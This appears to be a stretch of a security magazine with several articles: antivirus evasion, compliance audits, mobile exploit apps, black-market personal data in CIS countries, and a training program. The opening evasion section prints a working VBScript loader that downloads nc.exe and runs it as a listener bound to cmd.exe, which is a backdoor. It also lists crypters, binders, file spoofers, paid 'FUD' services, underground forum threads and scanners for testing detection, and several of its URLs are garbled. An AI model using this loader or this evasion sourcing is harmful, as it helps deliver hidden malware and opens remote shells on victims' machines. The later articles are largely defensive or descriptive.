https://www.mediafire.com/file/pazaz4pzwk27eow/%5BVIP%5DCrypter+v2f%2BUnique+Stub+Generator
+0.5.1+%5BFUD%5D%5BApril+2014%5D.rar
Loader / Dropper
A loader is a bootloader which by itself does not affect the system in any way, it is in the system for the
specified time and after it has completed downloading the payload is usually no longer used. An example
bootloader might be: vbs, js, hta, bat, ps1 and other files. Also, in Windows, there is built-in software such as
FTP, START (bat), using ps scripts or certutil can also download malware.
• Article on this subject:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers -to-download-malwarewhile-bypassing-av /
• Example of a loader on vbs
dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject ("Microsoft.XMLHTTP")
set stream_obj = CreateObject ("ADODB.Stream")
set shell_obj = CreateObject ("WScript.Shell")
URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe"' Name to save the file (on the local system)
50
Antivirus Evasion Basics
RUNCMD = "nc.exe - L -p 4444 -e cmd.exe "'Command to run after downloading
http_obj.open "GET", URL, False
http_obj.send
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
shell_obj.run RUNCMD
https://github.com/d4rkcat/cryptbinder
https://github.com/93aef0ce4dd141ece6f5/File-Binder Simple and generates a stub
https://github.com/NAWAK01/WinRAT classic dropper on command
Spoofers and diapers:
https://github.com/henriksb/ExtensionSpoofer
https://github.com/AHXR/maskedkitty
https://mega.nz/#!NxZACbJA!me-l4SBMoMkAGqbg1rwIVBLINeNvudC21NEBuskrsxU
https//www.forw.forw.forw.for showthread.php? t = 996627
51
Antivirus Evasion Basics
Glue / Joiner
Joiner by Blade, SuperGlue, MicroJoiner, Juntador
https://github.com/danielhnmoreno/pyJoiner
https://www.exejoiner.com/
Delivery
Online
Formats: Doc, Docx, Rtf.
Options: Social engineering, exploits in versions of
Obfuscation is often used when delivering documents.
Offline
Options: Social Engineering, Equipment Capture, Access
Rubber duckyAbility
https://github.com/SkiddieTech/UAC-DE-Rubber-Ducky
https://github.com/hak5darren/USB-Rubber-Ducky
52
Antivirus Evasion Basics
Digispark
https: // github.com/CedArctic/DigiSpark-Scripts
Ninja cable
https://usbninja.com/
In offline delivery, you can and should use spoofers.
What should be in the cryptor to secure
Anti Ring3 Hooks, Anti Emulator, Anti Debugger, Anti Dumper, Anti VM / SandBox
It can also give false positive antivirus - you should also understand this.
• Paid services
https://theoldphantom.net/
https://spartanproducts.net/
http://staticsoftwares.pro/
• People
https://bhf.io/threads/ 534014 /
https://lolzteam.org/threads/964713/
53
Antivirus Evasion Basics
https://darkwebs.cc/threads/95571/
https://darkwebs.cc/threads/749 46 /
https://lolzteam.org/threads/314158/
• Free services
http://virtualcrypt.xyz/
https://www.crypter.com/download.html
• crypto Crypto Forums
http://shanghaiblackgoons.com/ crypters /
http://www.blackhatrussia.com/crypters/
https://zhacker.net/crypter/
https://ifud.ws/forums/kriptory-jojnery.2/
• Where can I check FUD
https: // nodistribute. com
https://antiscan.me/
https://run4me.net/
Additionally
Information on what things affect detections from md5 to behavior and icons.
https://github.com/vulnz/false-positive-executed
https://ifud.ws/threads/exel-b-kurs-videourokov-krehkerstvo-programmirovanie-2017-pcrec.13022/
courses + software
54
Exelab
Compliance Audit for Critical Infrastructure
Compliance Audit for Critical Infrastructure
Dinesh Sharma
I always try to find bypasses even in the daily life things and systems that take
me deep into the security domain. I am still a student and always will be .I spent
many less sleep nights to achieve the goal of my interest. I like Python because
it is very easy to write and it is very powerful as well. Last year I passed the CEH
v|9 exam. I have certifications in Network Security, Web Security, Android apk
security, Linux server hardening, Anonymous browsing, End-point protection. I
am a hacker as well as a developer. I like to break things in order to secure
them, I love Python programming, developing websites and developing Android
apps. I am always open for exciting opportunities in security domain. Currently, I
am working as a Security Consultant at Security Brigade InfoSec Private
Limited. I am a fun loving person. You can connect with me on LinkedIn or
GitHub:
https://www.linkedin.com/in/dinesh2
https://github.com/Dineshboss
Logical Access Control basically defines the access level of a user in an application.
Just an application in enterprise network. There are many users in that application.
Some of them are admins, some of them are basic users. Admins are from differentdifferent departments. So different-different access provided to them.
Introduction
Compliance audit is a special kind of audit done to ensure that the standard policy defined by some world
recognized institute is being followed by the enterprise network. Customers also prefer to work with a company
who takes its security as the major concern.
Fig 1.1 Steps to achieve information security standard
55
Compliance Audit for Critical Infrastructure
In an organization, they have their own GRC team, which stands for Grievance, Risk and Advisory. This team
has some auditors who perform the compliance audit for the enterprise network in order to ensure that the
standard policy or SCD is being followed.
Types of Compliance Audit
Now let's try to understand the types of the compliance audit. These are given below:
• SOC 2: SOC 2 is a compliance audit defined by the AICPA (The American Institute of Certified Public
Accountants) for the companies who provide cloud solutions or if they process customer data in the cloud,
they have to undergo the thorough SOC 2 compliance audit. There are many companies who are providing
SAAS (software as a service) and have many security bugs. A SOC 2 audit done by a certified auditor detects
these bugs in their SAAS and defines a time period to complete the fixing process of the bugs.
Fig 2.1 Security controls in SOC 2 compliance audit
SOC 2 can be divided into two parts. These are given below:
• SOC 2 type 1:
It is done within a point of time. So question creation and deletion is done at that time only in order to check
whether the proper controls are implemented are not.
• SOC 2 type 2:
It is over a time period. It basically defines for six months first time and 1 year thereafter.
56
Compliance Audit for Critical Infrastructure
ISO 27001
It’s a compliance audit unlike SOC 2, which is specially defined for the SAAS supported companies. It is
adopted by all kind of enterprises in order to check the process of information security of their assets, like
employees, third parties, company data, information security systems, etc. When a company fulfills all the
requirements of ISO compliance then an ISO 27001 certificate is issued to that company by the ISO certified
auditors.
Fig 2.2 ISO 27001 checklist
General data protection regulation (GDPR)
Any company that deals with the EU citizens’ data has to go through this compliance audit. It was previously
defined for EU companies only but nowadays, any company that processes the EU citizens’ data has to follow
this GDPR audit.
Fig 2.3 GDPR controls
57
Compliance Audit for Critical Infrastructure
Sarbanes-Oxley (SOX)
This standard was defined by the US government in order to protect the shareholder from inaccurate finance
companies. Any organization that works in the financial industry has to comply with this SOX audit.
Fig 2.4 SOX audit
Industry-Specific Compliance Audits
These are some of the compliance audits defined for a specific industry:
• PCI-DSS (credit card and payments industry)
It is designed for the financial, merchants and payment solution provider companies. They are a major target of
hackers. Hackers generally try to compromise these industries in order to steal the customers money.
Fig 2.5 PCI DSS Requirements
58
Compliance Audit for Critical Infrastructure
• HIPAA (health care industry):
It is defined to protect patient data in the health care industry.
Fig 2.6 HIPAA Requirements
Some basic controls in all the compliance audits
Controls are the modules that define a particular way to achieve the information secure environment. Some of
common control are given below:
• Access control
When we talk about accessing any enterprise assets, in that case the access control rules should be defined
prior to this. Access control means how many resources are available to a particular user. Access control can
be of two types:
• Logical access control
It basically defines the access level of a user in an application. Just an application in enterprise network. There
are many users in that application. Some of them are admins, some of them are basic users. Admins are from
different-different departments. So different-different access provided to them.
Let's take an example of two admins. One admin is from the SOC department and the other one is from the
developer department. Below given access is provided to the SOC admin:
59
Compliance Audit for Critical Infrastructure
Access log view
Manage profile
Add another admin
Delete existing admin
Now the developer admin has the rights mentioned below:
Manage profile
Add another admin
Delete existing admin
Modify the existing admin
Based on the above mentioned situation we have to make some questions and try to get POCs or mail
confirmation for the same.
As we can that SOC admin has the right to add admin but there is no need to provide him the right to add or
delete admin. So our question will be:
“Why are add and delete admin rights provided to SOC admin? Kindly provide the business justification for the
same.”
Note: Required document SOP for rights allocation to admins from the application owner.
This situation is considered under the logical access control.
• Physical access controls
In these controls we discussed the physical accessibility to secure environment.
Let’s take an example. There is a server room and servers are placed in racks. So we asked for a list of all the
individuals who entered the server room and we found an electrician entered the server room. So, our questions
will be:
• Who gave permission to that electrician?
• Was it in knowledge of the infra admin that an electrician entered the server room?
• On what basis this entry provided?
• Was a higher authority there with him when he was inside the server room?
60
Compliance Audit for Critical Infrastructure
• CCTV footage for the same?
Encryption
This is very important when we talk about privacy when data flows from the external IT infra to secure server
environment or from secure environment to external IT infrastructure. So, our questions will be:
• Is 2 way TLS implemented on the data leaving the secure zone?
• Is 2 way TLS implemented among the servers in secure environment?
• Is internet accessible from the secure zone (server environment)?
Logging and Monitoring:
In this module, we basically talk about the logs generated at different-different systems.
Let’s take an example. There is a server and it is accessible through PIM (Privileged identity management). So,
one who has valid credentials first has to login into the PIM. Then from PIM, he will login into the server using
putty. So, our questions will be:
• Are PIM access logs are maintained?
• How long are PIM access logs maintained?
• Are server access logs maintained through PIM?
• How long are they maintained?
• Is there any situation in which direct access to the server is provided?
• Is monitoring done periodically?
Conclusion
Compliance audit has its own importance. In order to ensure the defense in-depth security for an organization,
it is important to perform penetration tests as well as compliance audits periodically and the fix must be
implemented as soon as possible.
References:
• https://hipaaacademy.net/hipaa-security-compliance-audit-for-evaluation-standard/
• https://www.imperva.com/learn/data-security/soc-2-compliance/
• https://www.thesigmanet.com/services/operational-risk-management/
61
Compliance Audit for Critical Infrastructure
• https://www.teramind.co/solutions/compliance/ISO-27001s
• https://community.dynamics.com/crm/b/roseaspdynamicscrmhostingnews/posts/sox-compliance-checklist
• https://hipaaacademy.net/hipaa-security-rule/
• https://blog.cobalt.io/crowdsourced-penetration-testing-and-pci-dss-compliance-586952710313
• https://learn.g2.com/compliance-audits
62
The Significance of Mobile Exploit
The Significance of Mobile Exploit
Applications
Ankit Giri
Speaker, presenter, and blogger, Ankit has a diverse background in writing
informational blogs. A penetration tester by profession with 4+ years of
experience. Part time bug bounty hunter. Featured in Hall of Fame of EFF,
GM, SONY, HTC, Pagerduty, HTC, AT&T, Mobikwik and with multiple other
Hall Of Fames. He loves speaking at conferences, has been a feature at
RSA APAC 2018, BSides Delhi 2017, CSA, Dehradun, Cyber Square
Summit, OWASP Jaipur and has been a regular feature at Infosec meetups
like Null and OWASP Delhi Chapter, Test Tribe and Peerlyst meetups.
Ankit has also taken hands-on session on Securing AWS environments at
null Bachaav. He has presented and demonstrated getting started with AWS
at Fore School of Management. He also leads the show for Peerlyst DelhiNCR chapter. He has an upcoming talk at RSA US 2019 on Mastering AWS
pentesting and methodology. He has published an article in PenTest
magazine on IoT security. He has been a featured profile at Peerlyst.
With the ever changing scenario of mobile OS the limitations to root and jailbreak
will lead to mobile exploit application being more significant. While these apps sit on
an end user’s device they help steal data (say reading application logs), make the
vulnerable unusable (logical DOS), bypass authentication and gain access (invoking
exported activity) and at times farming clicks (tapjacking). Mobile exploit application
development will be the next big thing, and there are people taking up such things
already.
What is an exploit application?
These are mobile applications developed to exploit (or make use of ) an existing vulnerability in one of the
applications installed on your phone. For example, if you have an application with logs being set to worldreadable, this exploit application will fetch the logs, look for sensitive information in logs and send to a server
for the next step of action. This is the probable method of stealing PII, user sensitive information like
credentials, API keys and credit card details.
63
The Significance of Mobile Exploit
Is the OS itself vulnerable?
The mobile OS ecospace is predominantly filled by the following two OSs: Android and iOS. We will be looking
at the architecture, the default security mechanisms implemented, and safeguarding techniques. There is no
comparison between the two operating systems, and we will go through both OSs one by one.
Android Architecture
Source: https://androidclarified.com/android-architecture/
UID Separation
The major sandboxing in Android is done using UID separation and it prevents anything other than the app
itself, certain components of the OS, or “root” user from accessing its data.
In the image below, it can be seen that the UID is assigned to the different apps or “packages” on the device.
These userId values are the same as the ones we will see when we view the permissions on the app’s files.
64
The Significance of Mobile Exploit
It can also be seen that on the left of the UID/GID is a column that shows the file or directory’s permissions. The
first character identifies the file type (- for regular files, d for directories).
iOS Architecture
Source: https://www.cse.wustl.edu/~jain/cse571-14/ftp/ios_security/index.html
The changing scenario of jailbreaking and rooting
Jailbreaking
There is a general belief that iOS is a secure OS, with hardware based encryption in place, and the claims do
sound true. At the same time, jailbreaking iOS devices with every release has been more difficult. The newer
devices coming with iOS 12 have been difficult to jailbreak, Apple has been upping the ante against
jailbreakers. The firm has started releasing patches for security vulnerabilities at shorter time frames. This has
lead to fixing of vulnerabilities used by the jailbreak but also changes the security posture of the OS, which
eventually makes jailbreaking difficult.
It also stops signing the older iOS version that can be jailbroken. The iOS 12 has introduced CoreTrust, which
checks that all signatures come from Apple, and thus stopping fake signing. It also has
vm_map_exec_lockdown, which locks down executable segment preventing remapping. Read more about
these changes at the Apple’s changelog here.
To Root or Not to Root
There are a number of apps that deal with sensitive data, and will they have root detection enabled. Such apps
cannot be used on rooted devices. A few examples of this type of app are banking, financial and sensitive data
handling apps, like PII processing applications such as Google Pay — it cannot even be opened on devices
that have been rooted. If losing access to such useful apps is a big deal, you might not want to root your
phone.
65
The Significance of Mobile Exploit
Has rooting become so much harder than it used to be?
In the past few versions of Android, we have noticed that gaining root access on most devices is much harder
than it once was. A couple of years back, some exploits could root most of the Android devices in a couple of
steps, but such exploits are rare to find nowadays. The last such exploit was Towelroot released in mid 2014,
and Google was very quick to patch it up.
Some vulnerabilities and their possible exploits
1. Exported components in AndroidManifest file like Activity
We can write an exploit application to execute an activity of a vulnerable application. The only prerequisite to
this would be an exported=true set for that particular activity in the manifest file. A way of invoking other
application’s activities is to write an exploit app and feed it with the name of the package and activity to be
launched. The following is a code to launch an activity “com.isi.testapp.Welcome”. In our case, the exploit app
doesn’t require any permission to launch the “Welcome” activity of the vulnerable app.
Mitigation
Setting android:exported attribute’s value to false
In the AndroidManifest.xml file of our application, we should add the following attribute to the application
component to be secured. In this scenario, com.isi.testapp.Welcome is the activity to be secured.
The android:exported property of the activity restricts other applications or any system component other than
the current app to be able to access this Activity. Only applications that have the same user id (or UID) as the
current app will be able to access this Activity.
2. Content Provider Leakage
There are certain cases where content providers are not implemented with intent for sharing data with other
applications, or the developer may want to give access only to those apps that have proper permissions. In this
case, proper security controls should be set for the application, otherwise, it would lead to leakage of
information.
The SMS application in Android devices is an example of content providers. Any other application can query
the inbox from the device using its URI content://sms/inbox.
The READ_SMS permission must be declared in the application’s AndroidManifest.xml file in order to access
the SMS app’s data.
66
The Significance of Mobile Exploit
Mitigation
Setting android:exported attribute’s value to false:
In the AndroidManifest.xml file of our application, we should add the following attribute to the content provider
to be secured. In our case, com.isi.contentprovider. MyProvider is the content provider.
If a content provider whose android:exported value is set to false is fetched using query command, it will throw
an exception:
Safeguarding mobile applications
The application components should not be set with export value to true
The application logs should not be world readable
The application code should be obfuscated
Application should have ssl pinning
Apply the Principle Of Least Privilege
No sensitive data should be stored on Client Side
Conclusion
With the ever changing scenario of mobile OS the limitations to root and jailbreak will lead to mobile exploit
application being more significant. While these apps sit on an end user’s device they help steal data (say
reading application logs), make the vulnerable unusable (logical DOS), bypass authentication and gain access
(invoking exported activity) and at times farming clicks (tapjacking). Mobile exploit application development will
be the next big thing, and there are people taking up such things already. There are a couple of online courses
specifically for mobile exploit application development. I would suggest being careful; don't install applications
from untrusted sources, check permissions required by the application, avoid rooting or jailbreaking devices
(unless absolutely necessary).
67
The Significance of Mobile Exploit
References:
• https://www.geeksforgeeks.org/android-system-architecture
• https://www.elearnsecurity.com/
• http://www.androidvulnerabilities.org/
• https://developer.android.com/training/articles/security-tips
• https://source.android.com/security/overview/updates-resources
• https://resources.infosecinstitute.com/android-application-security-testing-guide-part-1/#gref
• https://dzone.com/articles/qark-android-app-exploit-and-sca-tool
68
Black-Hats: How They Are Collecting
Personal Data in the CIS Countries
Black-Hats: How They Are Collecting
Personal Data in the CIS Countries
Vlad Martin
Vlad Martin is a Security Specialist who holds Msc in Finance and
Banking. His favourite security areas are Biometrical Physical
Access, Multi-Factor Authentication, Social Engineering, and
Security Architecture.
Imagine a system administrator working in a middle-sized company whose details
were bought by a hacker from some random country. Because this hacker has his/
her Data (passport, call detailing, SMS detailing, etc.), the attacker could easily hack
this administrator (well, not that easily if he isn’t qualified enough) and gain access
to his/her computer, then simply install a usual key logger and that’s it. Well, if it
doesn’t sound convenient enough for you, imagine the system administrator being
blackmailed for their SMS Messages or Phone Calls, and since he/she is scared
that their data will be made public, he/she gives them access to the server, and
that’s it. I mean, of course, these scenarios may sound a little bit unrealistic, but
from my experience, this is possible.
Introduction
If you live in EU, you feel that your personal data is protected. Of course it is, or most of it is protected, thanks
to the GDPR,, each company or public office is being strictly controlled by different Government authorities
(such as Personal Data Protection Office in Poland or The Office for Personal Data Protection in the Czech
Republic) – and some of the companies were already fined, for instance the latest Marriott case ($123 Million
fine) or the British Airlines case ($230 Million fine). Hence, this is how it has to be done when they deal with our
69
Black-Hats: How They Are Collecting
Personal Data in the CIS Countries
Personal Data. But it comes to our neighbors from the CIS Countries. Well, people usually are not aware of how
it works there, and I think it needs to be explained.
Firstly, when it comes to Personal Data Protection, each of these countries has its regulations. However, these
regulations are seemingly ineffective since the countries’ borders are almost thin as they are in the Schengen
zone, and so the Data could be transferred from one country to another easily.
Secondly, nobody cares. People are literally saying, “I have nothing to hide,” and that’s probably the biggest
mistake they are making. In my opinion, this is the reason why the current situation with Data Protection is that
bad.
When people hear about hackers, most of them instantly think about “Russian hackers” – of course, because of
the widespread news of high-profile cases(US Elections, Mass Data breaches, etc.), but nobody is questioning
how and why.
There was a big information security case last year in Russia. SEO Specialist, Pavel Medvedev, discovered that
a lot of big companies from the CIS region hadn’t secured their databases adequately, and because of that, all
of the databases were indexed on Yandex. People were able to find other people’s passport scans, plane or rail
tickets, Sberbank payment information, and many other sensitive data just by simply searching for it. The
funniest thing, though, that even after this breach, no one also got fined.
It is no secret that Personal Data is treated like garbage. I mean, whole printed databases are being thrown up
like trash; it even comes to the point that you can just go to the nearest garbage dump and get yourself a great
passport database, thanks to the big companies like “Svyaznoy” or “Euroset”.
(Sources in Russian: https://pikabu.ru/story/svyaznoy_berezhet_vashi_personalnyie_dannyie_6849399 https://
omsk.mk.ru/social/2018/08/17/dokumenty-s-personalnymi-dannymi-omichey-vybrosili-na-ulicu.html)
CIS Countries Data Theft
I already made some short review on this case earlier (https://www.linkedin.com/pulse/cis-countries-data-theftvlad-martin/), but it needs more explanation.
Let’s imagine we’re black-hat hackers trying to find all the info about somebody. Besides, is there even a way to
get Personal Data without hacking or phishing? We don’t want to use Social Engineering and retrieve the data
from somebody (because we are smart enough to understand that each call could be easily recorded and/or
traced). Hence, how should we go about this? The Russian Internet!
Currently, there’s a large Data Market on the Russian Internet. You don’t need to go to the DarkNet to buy
yourself a large database – for example, if you Google “Buy Data Forum” (in Russian, of course), the first link
you’ll get will be one of the biggest forums (ox****ck.com) offering a lot of databases and services: credit/debit
card details, passport details, military ID, location tracking (in real-time or geolocations history), hacked social
network accounts, call detailing. If we speak about services – you can easily buy yourself (or for someone you
70
Black-Hats: How They Are Collecting
Personal Data in the CIS Countries
know) a new passport, new credit card (registered on another person, of course), military ID, driver ID, SMS
detailing, sometimes even citizenship – and all these documents will be real and officially registered (if the deal
is going with the help of their “guarantor”).
And it’s not only about this black market. There are tons of resources which are used for identification
purposes, like “whose car this is”, “to whom this mobile number belongs”, etc., and most of them are free and
easy to find. Paid resources, of course, contain much more Personal Data.
What about other countries?
This is not only about the CIS citizens: you may find the databases for almost all of the countries, including EU
Countries. Your data are being sold on forums same as aforementioned, and it is not just a myth – it’s a reality.
According to BBC News,
I think it’s quite alarming. Despite the regulations, each country’s citizens’ personal data could be easily sold to
some criminal. As I mentioned in my last article, when I was previously working in a few firms, I had experience
with (legally working, by the way) companies specializing in data collection. Officially, of course, they were told
that they are using only public sources to collect the data to sell them. But since I knew few people working
there, they disclosed that all these data is being bought from other countries. Sources? Public offices, mobile
network operators, internet providers, etc. From what I saw (when they offered us to buy data for marketing
purposes), it was filled with Personal Data, I mean, the data comprised of passport details, addresses, mobile
phones, place of work, and other information which shouldn’t be shared at all.
71
Black-Hats: How They Are Collecting
Personal Data in the CIS Countries
How can Black-Hats use this data?
Imagine a system administrator working in a middle-sized company whose details were bought by a hacker
from some random country. Because this hacker has his/her Data (passport, call detailing, SMS detailing, etc.),
the attacker could easily hack this administrator (well, not that easily if he isn’t qualified enough) and gain
access to his/her computer, then simply install a usual key logger and that’s it. Well, if it doesn’t sound
convenient enough for you, imagine the system administrator being blackmailed for their SMS Messages or
Phone Calls, and since he/she is scared that their data will be made public, he/she gives them access to the
server, and that’s it. I mean, of course, these scenarios may sound a little bit unrealistic, but from my
experience, this is possible.
It doesn’t mean someone has to be hacked or blackmailed. In CIS countries, you can get a loan from some
small banks by simply presenting someone’s passport and tax ID. Or someone seeking to destroy their
competitor’s company – it could be easier by having their details, geolocation history, SMS detailing, and other
data. By getting your card details, the person can withdraw your money. Since I’m an ardent foe of Ads and
marketing, it is appalling to use this data for marketing purposes.
Conclusion
Nowadays, there’s no personal data protection system at all, and it doesn’t seem that there will be a positive
trend. It’s easy to collect the CIS citizens’ personal data and almost as easy to buy your sensitive info. In my
opinion, this is one of the reasons why we hear so much about the “Russian hackers”. Just be careful when
you’re entering personal data somewhere – it could easily be used against you, even if you’re an EU Citizen.
72
How StandardUser is Working with Practitioners and
Universities to Close the Talent Gap
How StandardUser is Working with
Practitioners and Universities to Close the
Talent Gap
Kent Potter
Kent Potter is COO and Partner at StandardUser Cyber Security and a
senior strategist and transformation executive with operations
experience in North America, Europe, and Asia. Kent leads complex
investigations and coordinates multi-disciplinary strategic initiatives for
clients in both the private and public sector. Kent holds two software
patents (#10264270 and #9936205), and led the development and sale
of 19 patents.
David Evenden
David Evenden is an experienced offensive security operator/analyst
with 10 years of active work experience inside the Intelligence
Community (IC). During his time inside the IC, he learned Persian Farsi,
worked at NSA Red Team and was a member of an elite international
team operating in conjunction with coalition forces to aid in the ongoing
efforts in the Middle East. While he currently works with an ISP and DHS
to aid in the efforts to enhance the bidirectional sharing relationship
between the US Government and Commercial entities, his passion is
educating network administrators and security engineers on best
practices when securing your network. David currently holds Pentest+
and CySA certificates.
Since we started in 2015, our team members have been on the front line of the cyber
security industry from both an offensive and defensive position. Identifying the
necessary skills, experience, and knowledge required to perform many of the most
critical cyber security roles can be difficult for hiring managers and often impossible
for recruiting teams. In response to this difficulty, we developed the Collegiate
Cybersecurity Education Program (C2EP) to bridge the education and experience
gap so that professionals can be poised for success in the field faster than ever
before.
73
How StandardUser is Working with Practitioners and
Universities to close the Talent Gap
Training aspiring hackers in the theory and practical Information Security is an absolute requirement. The
demand for highly skilled, competent cyber security professionals has never been greater. Markets and
industries throughout the world are demanding new tools and applications to streamline work processes,
improve educational systems, create efficiencies within governments, and to satisfy our insatiable need for ondemand content in our personal lives. These advancements bring with them risks unlike anything we have ever
experienced. Companies and individuals alike are vulnerable to nefarious actors and they are often completely
unaware.
Since we started in 2015, our team members have been on the front line of the cyber security industry from
both an offensive and defensive position. Identifying the necessary skills, experience, and knowledge required
to perform many of the most critical cyber security roles can be difficult for hiring managers and often
impossible for recruiting teams. In response to this difficulty, we developed the Collegiate Cybersecurity
Education Program (C2EP) to bridge the education and experience gap so that professionals can be poised for
success in the field faster than ever before.
C2EP is designed to be taught on university campuses to aspiring and current IT practitioners, preparing them
for highly sought after certifications in the industry. All C2EP courses are led by regional information security
practitioners who work at nearby cyber firms, and thus allowing students to learn firsthand how the skills they
are learning can be utilized in the market today. For instance an aspiring pentester currently working as an
engineer will learn the fundamentals and methodologies of penetration testing in the Pentest+ course.
The C2EP model is built on one week training courses that prepare students for a wide range of certifications;
focusing right now on the Net+, Sec+, CySA+, and Pentest+ exams. These courses run parallel to a students
existing class schedule and do not interfere with their regular studies. The premise of the program is to quickly
and effectively prepare students to pass their certification exams so that when they graduate they not only have
74
How StandardUser is Working with Practitioners and
Universities to close the Talent Gap
a degree but also industry recognized certifications. Additionally, professionals within the industry who are
looking to advance their careers are quickly able to acquire the necessary knowledge and skills to achieve their
certifications. The ability to combine both current students with working professionals creates a unique learning
environment that benefits everyone.
The course material is based on four corresponding study guides that we developed, with the help of the
community, in order to effectively communicate the core elements covered by the exams, a lab environment to
test new skills, and real-world experiences gained through experiences in the field. This Pentest+ book is an
example of the guides we use in the course. Our instructors, who are active practitioners, lead discussions that
delve further into each training element and participants gain insights into how their new technical skills can be
applied in the work environment. Our goal with C2EP is to empower students and professionals by equipping
them with the necessary skills and certifications to advance their careers and address the most challenging
issues facing companies today.
Some of these challenges range from Business Continuity and Asset Management to Threat Analytics and
Penetration Testing.
75
How StandardUser is Working with Practitioners and
Universities to close the Talent Gap
C2EP partner campuses provide the classroom setting and work closely with us in identifying the course
instructor. In partnership with StandardUser, Friends University in Kansas provides a state-of-the-art cyber lab
that ensures all course activities are executed in a controlled environment without requiring any additional staff
or resources from host campuses.
Sean Cash, the Assistant Chair of the Division of Business Information and Technology, said:
"Friends University understands that education comes in many forms, and to close the gap in the information
security labor market, we're offering a certified professional training program in the regions only Cyber Security
Attack Range built by Metova, Inc. that will help businesses identify skilled infosec practitioners ready to enter
the workplace." -Sean Cash Asst Professor of Business Management.
76